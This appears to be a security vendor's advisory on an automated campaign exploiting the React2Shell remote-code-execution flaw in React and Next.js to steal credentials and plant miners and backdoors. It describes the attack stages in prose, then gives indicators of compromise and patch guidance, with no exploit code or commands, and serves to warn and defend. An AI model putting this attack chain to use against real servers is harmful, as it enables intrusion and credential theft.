Hackers Exploit React2Shell in Automated Credential Theft Campaign
Apr 6, 2026
Summary
A large-scale cyber campaign is actively exploiting the critical React2Shell (CVE-2025-55182) vulnerability to compromise web applications and steal credentials. Threat actors are automating the exploitation process, scanning the internet for vulnerable React and Next.js applications, and deploying payloads that enable credential harvesting, malware delivery, and persistent access.
The campaign highlights how quickly attackers weaponize newly disclosed vulnerabilities—especially those enabling unauthenticated remote code execution (RCE).
Threat Overview
Category | Details |
|---|---|
Threat Type | Automated exploitation & credential theft |
Vulnerability | CVE-2025-55182 (React2Shell) |
Severity | Critical (CVSS 10.0) |
Target | React Server Components / Next.js apps |
Attack Vector | Malicious HTTP requests (unauthenticated) |
Impact | Credential theft, malware deployment, server compromise |
Activity Level | Active, large-scale exploitation |
What is React2Shell?
React2Shell is a critical unauthenticated remote code execution (RCE) vulnerability affecting React Server Components.
It allows attackers to execute arbitrary code on a server by sending a specially crafted HTTP request—without requiring authentication.
Because React powers a massive portion of modern web applications, the attack surface is extremely large, making this vulnerability particularly dangerous.
How the Attack Works
1. Internet-Wide Scanning
Threat actors begin by scanning the internet for exposed applications using vulnerable versions of React or Next.js.
Automated tools probe endpoints at scale
Vulnerable servers are quickly identified
Exploitation attempts begin almost immediately after discovery
This rapid scanning behavior has been widely observed across multiple campaigns.
2. Exploiting the RCE Flaw
Attackers send specially crafted HTTP requests that exploit unsafe deserialization in React Server Components.
No login required
Single request can trigger execution
Works on exposed production and dev environments
This gives attackers full control over the server process.
3. Payload Deployment
Once access is gained, attackers deploy second-stage payloads:
Credential stealers
Cryptominers (e.g., XMRig)
Backdoors and remote access tools
In some observed cases, shell scripts are downloaded and executed to establish persistence.
4. Credential Theft & Persistence
The primary objective of this campaign is credential harvesting.
Attackers:
Extract stored credentials and environment variables
Capture API keys and tokens
Maintain persistence via backdoors or scheduled tasks
This allows long-term access and potential lateral movement across infrastructure.
Why This Campaign Is Dangerous
Fully Automated Exploitation
Attackers are not manually targeting victims—this campaign is fully automated, enabling:
Massive scale attacks
Rapid compromise after vulnerability disclosure
Continuous scanning and reinfection attempts
Global Targeting
Organizations across industries and regions are affected due to the widespread use of React.
Multiple threat actors—including cybercriminal and state-linked groups—have been observed exploiting the flaw.
No Authentication Required
The vulnerability requires no credentials or user interaction, making it extremely easy to exploit.
Broad Ecosystem Impact
React2Shell impacts:
React 19.x environments
Next.js applications (App Router)
Any framework using React Server Components
Indicators of Compromise (IOCs)
Security teams should watch for:
Suspicious HTTP requests targeting RSC endpoints
Unexpected shell script execution
Outbound connections to unknown IPs
Presence of cryptominers or unknown binaries
Unauthorized changes in server files
Mitigation & Recommendations
Patch Immediately
Upgrade to secure versions:
React Server Components: 19.0.1 / 19.1.2 / 19.2.1 or later
Next.js patched versions
Patching is the most critical defense.
Monitor Logs
Track unusual API requests
Analyze application logs for exploitation patterns
Monitor for anomalous process execution
Secure Secrets
Rotate API keys and credentials
Avoid storing secrets in environment variables without protection
Use secure vaults
Restrict Exposure
Limit public access to development servers
Use WAF rules to block suspicious payloads
Implement network segmentation
ClearPhish Takeaway
The React2Shell campaign is a textbook example of how critical vulnerabilities evolve into automated attack pipelines within days of disclosure.
For organizations, the lesson is clear:
If a vulnerability allows unauthenticated RCE, assume it will be exploited at scale—immediately.
Security awareness, rapid patching, and proactive monitoring are no longer optional—they are essential.
Disclaimer: ClearPhish maintains a strict policy of not participating in the theft, distribution, or handling of stolen data or files. The platform does not engage in exfiltration, downloading, hosting, or reposting any illegally obtained information. Any responsibility or legal inquiries regarding the data should be directed solely at the responsible cybercriminals or attackers, as ClearPhish is not involved in these activities. We encourage parties affected by any breach to seek resolution through legal channels directly with the attackers responsible for such incidents.
